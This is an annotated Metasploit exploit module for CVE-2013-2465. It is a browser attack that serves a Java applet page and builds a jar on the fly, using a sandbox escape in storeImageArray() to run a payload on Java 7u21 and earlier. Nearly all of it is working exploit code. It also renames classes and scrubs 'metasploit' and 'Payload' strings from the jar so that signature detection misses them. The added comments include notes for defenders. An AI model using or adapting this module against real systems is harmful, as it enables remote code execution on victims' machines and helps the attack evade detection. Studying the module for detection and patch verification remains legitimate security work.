##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2013-2465 (Java storeImageArray() invalid
# array indexing). It serves an HTML page whose <applet> tag points at a
# jar that is assembled per request from three precompiled classes shipped
# in the framework data directory.
#
# Defender notes, taken from the metadata and code below:
# - The description states the flaw affects Java 7u21 and earlier; hosts on
#   later releases are outside this module's scope.
# - The Rank comment records that click-to-play is NOT bypassed, so the
#   applet approval prompt remains an effective control where it is enforced.
# - Every identifying string (class names, jar name, the "metasploit" and
#   "Payload" tokens inside jar entries) is randomised in #setup and
#   #generate_jar, so content signatures on those tokens are unreliable;
#   an applet loaded from an unexpected origin is the more stable observable.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Module metadata only; no state is set up here beyond what update_info
  # records. Three targets are declared: a Java payload (default) and x86
  # native payloads for Windows and Linux. The 'Notes' entries are left as
  # the UNKNOWN_* placeholders — fill them in if the module is re-tested.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
        'Description' => %q{
          This module abuses an Invalid Array Indexing Vulnerability on the
          static function storeImageArray() function in order to cause a
          memory corruption and escape the Java Sandbox. The vulnerability
          affects Java version 7u21 and earlier. The module, which doesn't bypass
          click2play, has been tested successfully on Java 7u21 on Windows and
          Linux systems.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'PACKETSTORM', '122777' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
        'Platform' => %w{java linux win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-08-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Reads the three precompiled applet classes from the framework data
  # directory into memory and renames their identifiers in place, then
  # hands off to the mixin's own setup via super.
  #
  # Every replacement is generated with exactly the length of the name it
  # replaces (rand_text_alpha("Exploit".length), ...). The substitution is
  # done on the raw class-file bytes rather than by recompiling, so the
  # equal length is presumably what keeps the length-prefixed entries of
  # the class files consistent — confirm against the class-file format
  # before changing any of these lengths.
  #
  # Each of the three buffers gets all three substitutions because the
  # inner classes reference the outer class name and vice versa.
  #
  # @raise [Errno::ENOENT] if any of the class files is missing from the data directory
  def setup
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
    @color_model_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    # Same-length random replacements for the three class names.
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)

    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_model_class.gsub!("Exploit", @exploit_class_name)
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_space_class.gsub!("Exploit", @exploit_class_name)
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)

    super
  end

  # HTTP request handler for the module's resource.
  #
  # Dispatch, in order:
  # 1. A URI that does not end in ".jar" and has no trailing "/" is
  #    redirected to "#{get_resource}/" — presumably so that the relative
  #    archive URL in the applet tag resolves under the resource path.
  # 2. A URI that does not end in ".jar" but ends in "/" receives the
  #    applet HTML from #generate_html.
  # 3. A URI ending in ".jar" receives the jar from #generate_jar, after
  #    which the payload handler is started for that client.
  #
  # NOTE(review): both patterns anchor with `$`, which in Ruby matches at
  # any line end rather than only the end of the string; `\z` (or
  # String#end_with?) would anchor the whole URI. `if not request.uri =~`
  # is more idiomatically written `unless request.uri =~ /\/$/`.
  #
  # @param cli [Object] the client connection supplied by the HTTP server mixin
  # @param request [Object] the parsed request; only #uri is read here
  def on_request_uri(cli, request)
    vprint_status("Requesting: #{request.uri}")
    if request.uri !~ /\.jar$/i
      if not request.uri =~ /\/$/
        vprint_status("Sending redirect...")
        send_redirect(cli, "#{get_resource}/", '')
        return
      end

      print_status("Sending HTML...")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    print_status("Sending .jar file...")
    send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })

    # Start the handler only once the jar has actually been served.
    handler(cli)
  end

  # Builds the landing page: a bare <applet> element whose archive name is
  # a random 5–7 letter string and whose code attribute is the renamed
  # exploit class chosen in #setup.
  #
  # The trailing gsub strips the four-space source indentation from the
  # %Q literal so the served markup starts each line at column 0; the
  # indentation inside the literal must therefore stay at exactly four spaces.
  #
  # Detection note: nothing in this page is a stable string beyond the
  # <applet> structure itself; the observable is an applet with a random
  # archive/code name loaded from an origin that should not serve Java.
  #
  # @return [String] the HTML document
  def generate_html
    jar_name = rand_text_alpha(5 + rand(3))
    html = %Q|<html>
    <head>
    </head>
    <body>
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
    </applet>
    </body>
    </html>
    |
    html = html.gsub(/^ {4}/, '')
    return html
  end

  # Builds the jar served to a client.
  #
  # The payload's encoded jar is the base; the three renamed applet classes
  # from #setup are added under their random names, then every entry name
  # and entry body has "metasploit" and "Payload" replaced by same-length
  # random strings before the manifest is rebuilt. As in #setup the
  # replacement works on raw bytes, which is presumably why the lengths are
  # preserved — confirm before changing them. The matches are case-sensitive
  # exactly as written ("metasploit" lowercase, "Payload" capitalised).
  #
  # @param cli [Object] the client connection; used to regenerate the payload for this client
  # @return [String] the packed jar bytes
  def generate_jar(cli)
    p = regenerate_payload(cli)
    jar = p.encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
    # Same-length random replacements, mirroring the renaming done in #setup.
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
    jar.build_manifest

    return jar.pack
  end
end